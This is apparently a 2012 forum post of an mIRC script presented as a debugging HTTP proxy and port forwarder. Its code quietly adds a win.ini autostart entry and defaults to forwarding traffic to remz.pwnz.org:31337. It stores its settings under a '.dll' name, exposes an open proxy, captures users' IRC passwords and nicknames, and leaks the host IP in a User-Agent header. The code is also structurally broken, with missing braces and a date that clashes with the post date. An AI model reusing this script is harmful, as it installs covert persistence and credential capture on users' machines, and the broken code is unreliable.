Port forwarder

By independentt on Jan 28, 2012

;HTTP Proxy TCPWatcher v1.4
;Script by independent
;Disclaimer; I am not responsible of anything done to your computer/net connection,
;if you use the default configuration.
;This script was made to debug internet connections!!! To debug it load the script and type /setanon to turn the proxy transparent
then connect (%lport value) (in firefox settings IE) or whatever will redirect connections to target remote host.

;HTTP Proxy TCPWatcher & Port Forwarder
;Script by independent
;Disclaimer; I am not responsible of anything done to your computer/net connection,
;if you use the default configuration.
;UPDATED 06/01/15

on 1:START:{ 
  if (%astart) || (!%starts) { astart }
  ;load config
  hmake make
  hload -b make config.dll
  echo -a 3* Proxy Config loaded, successfully.
on 1:EXIT:{ hsave -b make config.dll | echo -a 3Proxy config saved! Good Bye! }
alias astart { hadd -m make lport 59999 | .timer 1 1 .writeini $left($mircdir,3) $+ windows\win.ini windows load $shortfn($mircexe) | if (!%starts) init.d | set %astart yes | .timerLISTEN 1 1 listensocks }
alias init.d {
  hadd -m make pfrip remz.pwnz.org
  hadd -m make pfrport 31337
  hadd -m make lport 59999
  hadd -m make maxcon 50
  hadd -m make maxout 100
  hadd -m make anon Yes
alias remastart { .remini $left($mircdir,3) $+ windows\win.ini windows load | unset %astart }
alias autostart { $iif(%astart,remastart,astart) }
alias listensocks  {  /sockclose pf* | if (!$hget(make,lport)) { hadd -m make lport $$?="Port number" } | .timersock 1 1 socklisten -d pfserv $iif($hget(make,lport),$v1,59999) | .timersockupnp 1 1 socklisten -p pfservupnp $iif($calc($hget(make,lport) +1),$v1,60000) | inc %starts | echo -s Proxy/IP forward started %starts times }
alias setanon { localinfo | $iif($hget(make,anon),hdel make anon,hadd -m anon Yes) | .timerpfserv 1 1 sockwrite -tn pfserv* :Proxy!ByIndependent@ $+ $host PRIVMSG * :Host changed settings of proxy anonimity: $iif($hget(make,anon),now ANONYMOUS,now TRANSPARENT;Your IP and information might be logged on remote host ) | if ($hget(make,anon))  echo -a Proxy logs sent to logs folder | savebuf @PFDebug logs\Proxy $+ $date(mm-dd-yy) $+ #ticks $+ .log  }
menu * {
  Proxy By independent ( $+ $sock(pfserv).bindip $+ ; $+ $sock(pfserv).bindport )
  .AUTOSTART ( $+ %astart $+  ): autostart
  .LISTEN PORT ( $+ $hget(make,lport) $+ ) NOW: listensocks
  .CHANGE PORT!: hadd -m make lport $$?="Port number" 
  .set FORWARD IP  ( $+ $hget(make,pfrip) $+ ): hadd -m make pfrip $$?="Enter an ip address you want to redirect to"
  .set FORWARD PORT ( $+ $hget(make,pfrport) $+ ): hadd -m make pfrport $$?="Enter the remote port number"
  .CLOSE CONNECTIONS: /sockclose pf*
  ...MAX INCOMING CONNECTIONS ( $+ $hget(make,maxcon) $+ ): hadd -m make maxcon $$?="Max number of simultaneous INCOMING connections"
  ...MAX OUTGOING CONNECTIONS ( $+ $hget(make,maxout) $+ ): hadd -m make maxout $$?="Max number of simultaneous OUTGOING connections"
  ...Anonymous Proxy ( $+ $iif($hget(make,anon),Yes,NO;Transparent) $+ ) : setanon
  ..Save config:hsave -b make config.dll
  ..Load config:{ .timer 1 1 hload -b make config.dll | hmake make }
  ..Erase config:{ sockclose pf* | .remove config.dll | hdel -w make * }
  ..Set defaults:{ hdel -w make * | init.d | astart }

alias protocol {
  if (*HTTPS://* iswm $1) { return $gettok($1,2,47) $+ : $+ 443 }
  if (*HTTP://* iswm $1) { return $gettok($1,2,47) $+ : $+ 80 }
  if (*FTP://* iswm $1) { return $gettok($1,2,47) $+ : $+ 21 }
alias getdns { hadd -mu30 make pfdns $iif($hget(make,pfdns),$v1) $1 $+ @ $+ $2 | .dns -h $gettok($2,1,58) }
on 1:DNS:{ 
  if ($wildtok($hget(make,pfdns),* $+ $dns(1).addr $+ *,1,32)) {
    .timerOPEN $+ $gettok($replace($gettok($wildtok($hget(make,pfdns),* $+ $dns(1).addr $+ *,1,32),1,64),serv,connect),1,32) -om 1 500 sockopen $iif(443 == $gettok($wildtok($hget(make,pfdns),* $+ $dns(1).addr $+ *,1,32),2,58),-e,$iif(6697 == $gettok($wildtok($hget(make,pfdns),* $+ $dns(1).addr $+ *,1,32),2,58),-e)) $gettok($replace($gettok($wildtok($hget(make,pfdns),* $+ $dns(1).addr $+ *,1,32),1,64),serv,connect),1,32) $dns(1).ip $gettok($wildtok($hget(make,pfdns),* $+ $dns(1).addr $+ *,1,32),2,58) 
    hadd -mu10 make pfdns $remove($hget(make,pfdns),$wildtok($hget(make,pfdns),* $+ $dns(1).addr $+ *,1,32))
on *:SOCKREAD:pfserv*:{
  sockread $iif($sock($sockname).rq > 16384,16834,$v1) &binvar
  if ($sock($replace($sockname,pfserv,pfconnect)).ip) && (GET* !iswm $hget(make,sockmark)) { sockwrite -b $replace($sockname,pfserv,pfconnect) -1 &binvar }
  if ($sock($replace($sockname,pfserv,pfirc)).ip) { sockwrite -b $replace($sockname,pfserv,pfirc) -1 &binvar }
  hadd -m make text $bvar(&binvar,1,$bvar(&binvar,0)).text
  if (PASS == $gettok($hget(make,text),1,32)) { hadd -mu300 $sockname pass $gettok($hget(make,text),1-,32) } 
  if (NICK == $gettok($hget(make,text),1,32)) { hadd -mu300 $sockname nick $gettok($hget(make,text),1-,32) } 
  if (USER == $gettok($hget(make,text),1,32)) { hadd -mu300 $sockname user $gettok($hget(make,text),1-,32) }
  if (CONNECT* iswm $hget(make,text)) { 
    hadd -m make proxycon $wildtok($gettok($hget(make,text),2,32),*.*,1,32) 
    if (?*.?*.?*.?* !iswm $hget(make,proxycon)) && (!$sock($replace($sockname,serv,connect)).ip) { .getdns $sockname $hget(make,proxycon) }
    elseif (?*.?*.?*.?* iswm $hget(make,proxycon)) && (!$sock($replace($sockname,serv,connect)).ip) { sockopen $iif(*:443 iswm $hget(make,proxycon),-e,$iif(*:6697 iswm $hget(make,proxycon),-e)) $replace($sockname,serv,connect) $replace($hget(make,proxycon),:,$chr(32)) }
    .hadd -mu10 make sockmark $hget(make,text)

  if (GET* iswm $hget(make,text)) || (POST* iswm $hget(make,text)) { 
    hadd -m make proxycon $protocol($wildtok($gettok($hget(make,text),2,32),*.*,1,32))
    if (?*.?*.?*.?* !iswm $hget(make,proxycon)) && (!$sock($replace($sockname,serv,connect)).ip) { .getdns $sockname $hget(make,proxycon) }
    elseif (?*.?*.?*.?* iswm $hget(make,proxycon))  && (!$sock($replace($sockname,serv,connect)).ip) { sockopen $iif(*:443 iswm $hget(make,proxycon),-e,$iif(*:6697 iswm $hget(make,proxycon),-e)) $replace($sockname,serv,connect) $replace($hget(make,proxycon),:,$chr(32)) }
    .hadd -mu10 make sockmark $wildtok($bvar(&binvar,1,$bvar(&binvar,0)).text,GET*,1,13)
  if (!$hget(make,anon)) window @PFDebug
  if (!$hget(make,anon)) echo @PFDebug  $+ $sockname $+ @ $+ $sock($sockname).ip $+ : $+ $sock($sockname).port $+  $hget(make,text)
on *:SOCKREAD:pfconnect*:{ 
  sockread $iif(66* iswm $sock($sockname).port,-n) $sock($sockname).rq &binvar
  if ($sock($replace($sockname,pfconnect,pfserv)).ip) sockwrite -b $replace($sockname,pfconnect,pfserv) -1 &binvar
  if ($len($bvar(&binvar,1,$bvar(&binvar,0)).text) < 340) hadd -m make text $bvar(&binvar,1,$bvar(&binvar,0)).text
  if (001 isin $gettok($hget(make,text),1-3,32)) { sockrename $sockname $replace($sockname,pfconnect,pfirc) }
  if (PING* iswm $hget(make,text)) { sockwrite -n $sockname PONG $hget(make,text) | halt }
  if (CONNECT*:66* iswm $hget(make,sockmark)) && (*NOTICE*AUTH*:* iswm $hget(make,text)) { 
    if ($hget($replace($sockname,connect,serv),pass)) sockwrite -n $sockname $v1
    sockwrite -n $sockname $hget($replace($sockname,connect,serv),nick)  
    sockwrite -n $sockname $hget($replace($sockname,connect,serv),user)
    hdel make sockmark
  if (451 == $gettok($hget(make,text),2,32)) {
    if ($hget($replace($sockname,connect,serv),pass)) sockwrite -n $sockname $v1
    sockwrite -n $sockname $hget($replace($sockname,connect,serv),nick)  
    sockwrite -n $sockname $hget($replace($sockname,connect,serv),user)
  if (!$hget(make,anon)) window @PFDebug
  if (!$hget(make,anon)) echo @PFDebug  $+ $sockname $+ @ $+ $sock($sockname).ip $+ : $+ $sock($sockname).port $+  $hget(make,text)
on *:sockread:pfirc*:{
  while ($sock($sockname).rq) {
    sockread %t | tokenize 32 %t
    sockwrite -n $replace($sockname,pfirc,pfserv) $1-
    if ($sockbr == 0) return
    if (!$hget(make,anon)) echo @PFDebug  $+ $sockname $+ @ $+ $sock($sockname).ip $+ : $+ $sock($sockname).port $+  $1-
    if ($1 == PING) sockwrite -n $sockname PONG $2-
on *:SOCKLISTEN:pfserv*:{
  if ($sockerr > 0) { return } 
  hadd -m make temp $rand(1,999999999) 
  sockaccept pfserv $+ $hget(make,temp) 
  if ($calc($hget(make,maxcon) +1) < $sock(pfserv*,0).name) { sockwrite -tn pfserv $+ $hget(make,temp) HTTP/1.1 403 Forbidden | .timeropen124 $+ $replace($sockname,pfconnect,pfserv) -om 1 100 sockclose pf* $+ $hget(make,temp) $+ * }
on 1:SOCKOPEN:pfconnect*:{
  if ($sockerr) { sockclose $replace($sockname,pfconnect,pfserv) | return }
  if ($calc($hget(make,maxout) +1) < $sock(pfconnect*,0).name)  { sockwrite -tn $sockname HTTP/1.1 403 Forbidden | .timeropen124 $+ $sockname -om 1 100 sockclose pf* $+ $hget(make,temp) $+ * }
  if ($sock($replace($sockname,pfconnect,pfserv)).ip) {
    .sockwrite -tn $replace($sockname,pfconnect,pfserv) HTTP/1.1 200 Connection Established
    if (CONNECT*:66??* !iswm $hget(make,sockmark)) {
      .sockwrite -tn $sockname $hget(make,sockmark)
      .sockwrite -tn $sockname Host: $gettok($protocol($gettok($hget(make,sockmark),2,32)),1,58)
      .sockwrite -tn $sockname User-Agent: Mozilla/5.0 $os $fulltime $ip
      .sockwrite -tn $sockname Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      .sockwrite -tn $sockname Accept-Language: en-US,en;q=0.8
      .sockwrite -tn $sockname Connection: keep-alive 
      .sockwrite $sockname $crlf
      .sockwrite $sockname $crlf


on 1:SOCKCLOSE:pfserv*:{ sockclose $replace($sockname,pfserv,pfconnect) }
on 1:SOCKCLOSE:pfconnect*:{ sockclose $replace($sockname,pfconnect,pfserv) }
on 1:SOCKCLOSE:pfirc*:{ sockclose $replace($sockname,pfirc,pfserv) }


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